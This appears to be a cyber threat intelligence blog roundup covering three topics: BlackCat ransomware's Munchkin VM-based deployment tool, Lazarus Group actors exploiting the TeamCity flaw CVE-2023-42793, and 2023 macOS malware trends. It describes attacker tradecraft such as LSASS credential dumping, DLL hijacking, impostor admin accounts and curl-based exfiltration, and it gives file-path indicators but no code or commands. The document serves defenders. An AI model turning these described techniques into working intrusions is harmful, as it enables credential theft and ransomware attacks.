CTI Roundup: North Korean Lazarus Group Exploits JetBrains TeamCity Flaw

In this week’s roundup, CTI reveals the latest activities of BlackCat’s ransomware operators including their latest tooling updates. Next CTI investigates two North Korean nation state threat actors that are part of the Lazarus Group and their recent exploitation of CVE-2023-42793. CTI concludes with a breakdown of how threat actors are using new techniques to compromise Macs, leading Apple to evolve its defenses and enhance built-in antimalware protection.

1. BlackCat operators introduce Munchkin utility

The operators behind BlackCat ransomware recently announced updates to their tooling, including a utility called Munchkin which allows threat actors to propagate the BlackCat payload to remote machines and shares within networks.

A recently acquired instance of Munchkin is loaded in a customized Alpine Virtual Machine, which enables the threat actor to use virtual machines (VMs) to circumvent security solutions.

About BlackCat ransomware

BlackCat operates as a ransomware-as-a-service (RaaS), which allows affiliates to leverage their tooling in return for a portion of the profits. While the group historically focused on victims within the United States, it has broadened its scope and evolved over the years to leverage additional capabilities and obfuscation mechanisms.

BlackCat historically focused on victims within the United States. However, the malware family has recently broadened its scope due to rising popularity. The malware family has continued to evolve over the years to leverage additional capabilities and obfuscation mechanisms.

BlackCat introduces Munchkin utility

The group recently introduced a new tool known as Munchkin which provides a Linux-based OS featuring Sphynx which is the latest BlackCat variant. Operators can use the Munchkin utility to run BlackCat on remote machines or encrypt remote SMB/CIFS.

• BlackCat’s new Munchkin utility is delivered to victims as an ISO file that is loaded in a newly installed instance of the VirtualBox virtualization product.
• The ISO file is a customized implementation of the Alpine OS. The threat actor likely chose this because of its small footprint. When running the OS, several commands are executed that enable the malware to change the root password of the VM.
• It then generates a new terminal session via the built-in tmux utility, which is used to execute the malware binary named controller, and powers the VM off.
• The controller malware is hosted within the /app directory alongside several other related files. Some notable files include /app/controller, /app/config, and /app/payload. Several other Python scripts are also present that can be used in subsequent updates within the VM. Many of the scripts can be used for lateral movement, password dumping, and further execution of malware.

Controller malware

The controller malware is written in Rust, in a manner that is very similar to the BlackCat malware family.

Once executed it will decrypt several strings via a unique single-byte XOR operation. It then performs basic checks to make sure the expected configuration and payload files are in the /app directory. If confirmed it will parse the config file. If not, it will exit with an error message.

The /app/config file contains information including access tokens, task identifiers, victim credentials, BlackCat victim URLs, blocklisted file types and paths, and hosts/shares to target for encryption. It will then create and mount the /payloads/ directory that is used to host instances of BlackCat. The controller will use the /app/payload as a template to create customized BlackCat samples. Within the template file there are multiple specific markers that the controller will look for and use to modify the file.

The created files are named with incremental values in the format of /payloads/0. Once the payloads are created the malware will iterate through the provided configuration with the intent of infecting any SMB/CIFS drives that were specified. After the malware finishes execution the VM will power off and perform no additional actions.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

BlackCat has remained one of the most active ransomware operations for quite some time. The operation’s constant addition of new features and tooling, like the latest Munchkin utility, clearly contributes to its continued success.

The latest tactic of leveraging a customized VM to deploy its malware is slowly growing in popularity among threat actors and is something we could see more of in the near future.

2. North Korean Lazarus group actors exploit JetBrains TeamCity flaw

According to Microsoft, two North Korean nation-state threat actors from the Lazarus Group are exploiting CVE-2023-42793. The remote code execution vulnerability impacts multiple versions of the JetBrains TeamCity server — a continuous integration/continuous deployment (CI/CD) application.

The threat actors are likely exploiting this flaw to deploy backdoor malware and carry out software supply chain attacks.

Diamond Sleet and Onyx Sleet

The two threat actors observed by Microsoft are Diamond Sleet and Onyx Sleet (also known as Andariel). Both are part of the infamous nation-state actor known as the Lazarus group.

• Diamond Sleet typically targets media, IT services, and defense entities globally and has more recently been seen targeting security researchers. The group has also previously carried out software supply chain style attacks.
• Onyx Sleet primarily targets defense and IT services organizations located in South Korea, the U.S., and India. They leverage a wide range of tools for persistence and frequently exploit N-day vulnerabilities for initial access.

Attack path 1: Diamond sleet

The attack begins with a successful compromise of TeamCity servers via the CVE-2023-42793 vulnerability.

Following the exploitation, Diamond Sleet leveraged PowerShell to download additional payloads from legitimate infrastructure that had been previously compromised. These payloads are stored in the C:\ProgramData directory as Forest64.exe and 4800-84DC-063A6A41C5C, the first of which will check for the presence of the latter.

The decrypted content of 4800-84DC-063A6A41C5C is the configuration file for the ForestTiger malware. Forest64.exe will create scheduled tasks to run at system start for persistence. It will also leverage the ForestTiger backdoor to dump credentials via LSASS.

Attack path 2: Diamond sleet

The same threat actor is also deploying payloads for use in DLL search order hijacking attacks after exploiting the CVE-2023-42793 vulnerability. To do so, they leverage PowerShell to download malicious DLLs from their infrastructure. This DLL is staged alongside a legitimate executable.

When Version.dll is loaded by the legitimate clip.exe, it loads and decrypts the contents of a readme.md file that is downloaded from the threat actor’s infrastructure. This file contains data for decrypting position-independent code embedded in Version.dll, thus launching the final stage RAT. The second-stage executable decrypts a config file containing URLs that the malware will use for C2. Again, Microsoft observed the threat actor dumping credentials via LSASS.

Attack path 3: Diamond sleet

The third observed attack path is carried out by Onyx Sleet. It also begins with successful exploitation of the CVE-2023-42793 vulnerability.

In this example, the threat actor creates a new user account on compromised systems named krtbgt, that is likely used to impersonate the legitimate KRBTGT Windows account. This account is then added to the Local Administrators Group through net use. Onyx sleet deploys a unique payload that is downloaded from their infrastructure to either C:\Windows\Temp\temp.exe or C:\Windows\ADFS\bg\inetmgr.exe. The payload will decrypt an embedded PE resource which is then loaded into memory and launched. The inner payload is a proxy tool used to establish persistence and has been identified as HazyLoad.

This threat actor has also been observed using the created krtbgt account to sign into the compromised device via RDP — stopping the TeamCity service, dumping credentials via LSASS, and deploying tools to retrieve credentials stored in browsers.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

Microsoft has been observing this activity since early October even though a fix for this TeamCity vulnerability was released last month — highlighting the fact that there are still vulnerable instances that have yet to be patched.

The two threat actors observed in this activity are both affiliated with the Lazarus Group but used different toolsets and attack paths after exploiting the CVE-2023-42793 vulnerability to achieve their goals.

The Lazarus Group and all its affiliated clusters are a sophisticated threat and are capable of launching damaging attacks. Their TTPs are changing rapidly with each attack, making it important to be aware of their latest activity and ensure you have proper detection mechanisms in place.

3. Threat actors target macOS with evolving techniques

2023 has brought several new approaches to compromising Macs. As a result, Apple is evolving its defenses and continually adding new rules to its XProtect antimalware tool.

A new report from SentinelOne highlights some of the major macOS malware that was recently discovered, and details how threat actors are adapting and adjusting to successfully compromise macOS devices.

Persistence is no longer a priority for infostealers

This year there has been an increase in macOS malware families that deliberately avoid persistence. This is characteristic of infostealers, as they tend to achieve their goal in one execution.

Given how lucrative stolen data can be for threat actors, they typically have no need to persist on the device. Exfiltrated data often gives threat actors what they need for further access and compromise.

On the rise: Targeted social engineering

Threat actors are now using more sophisticated social engineering techniques, particularly in macOS incidents.

For example, macOS malware like RustBucket entices victims to open a “confidential” document and download a PDF viewer that executes malware behind the scenes. RustBucket requires users to override Apple’s macOS security mechanisms.

Researchers have also observed less sophisticated malware aimed at small businesses. The macOS MetaStealer campaign targeted its victims with social engineering lures like “advertising terms of reference” and “Brief_Presentation-Task_Overview.” The files were disk images containing infostealer malware disguised as PDF documents.

Increased use of public offensive security tools

It’s common for threat actors to use offensive security tools for Windows systems, as is evident with Cobalt Strike. The same trend is now starting to be seen in the macOS malware world too. For example, projects like Geacon wrap Cobalt Strike capabilities in Go-based payloads. Many have been seen embedded in fake versions of enterprise apps like SecureLink, beaconing out to C2s.

The open-source red teaming tool Mythic and various payloads like Poseidon have also been seen in recent macOS campaigns. These function as an implant and C2 administration suite much like Cobalt Strike. Poseidon has built in obfuscation and encrypted communications, providing threat actors with a powerful toolkit.

SentinelOne notes that Apple’s malware blocking service, XProtect, does not yet contain a signature to detect Poseidon payloads, requiring additional security.

Living off the orchard

Living-off-the-land (LOLbin) techniques have historically been used in attacks targeting other payloads. But on macOS, there is an increasing recognition of these techniques that are sometimes described as living-off-the-orchard (LOOBins).

The most commonly used built-in tools include:

• System_profiler for gathering data about local installations
• Sw_vers for collecting the OS system version and build
• Curl for downloading and exfiltrating data

One of the most common malware families seen in 2023 and throughout the past few years is Adload, which uses a combination of LOLBins.

Abusing open-source software for initial compromise

JokerSpy malware emerged over the summer, containing several components including two python backdoors, the red-teaming tool SwiftBelt, and a Swift-based Mach-O that attempts to masquerade as Apple’s XProtect service. Researchers believe some of these attacks began via a trojanized QR code generator known as QRLog.

Protecting payloads with multi-stage, modular malware

One of the year’s most complex supply chain attacks compromised downstream businesses by malicious tampering with 3CX’s call routing software client, 3CXDesktopApp. Various initial and intermediate stages of the malware were discovered for the macOS side of the infection chain, but the true final stage payload is unknown. Known stages of the malware were clearly built for stealth and relied on users launching the trojanized application for persistence. It collected limited data about the host’s 3CX account before sending that information to the threat actor and self-deleting.

Similarly, the JumpCloud attack in July 2023 used several stages for stealth and to protect late-stage payloads. Both campaigns have been attributed to DPRK-linked threat actors with an emphasis on supply chain attacks.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

SentinelOne’s analysis sheds light on how threat actors are increasingly targeting macOS. Apple’s security team has seemingly been working to improve its efforts to detect malware targeting its own platform, but progress has been slow.

An example of this can be seen with the Atomic Stealer macOS malware that was first reported back in May. Apple just added rules for Atomic Stealer to XProtect in October. This example highlights the importance of quickly identifying and protecting against emerging threats.

---

Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.

For further reading, catch up on our recent cyber threat intelligence roundups.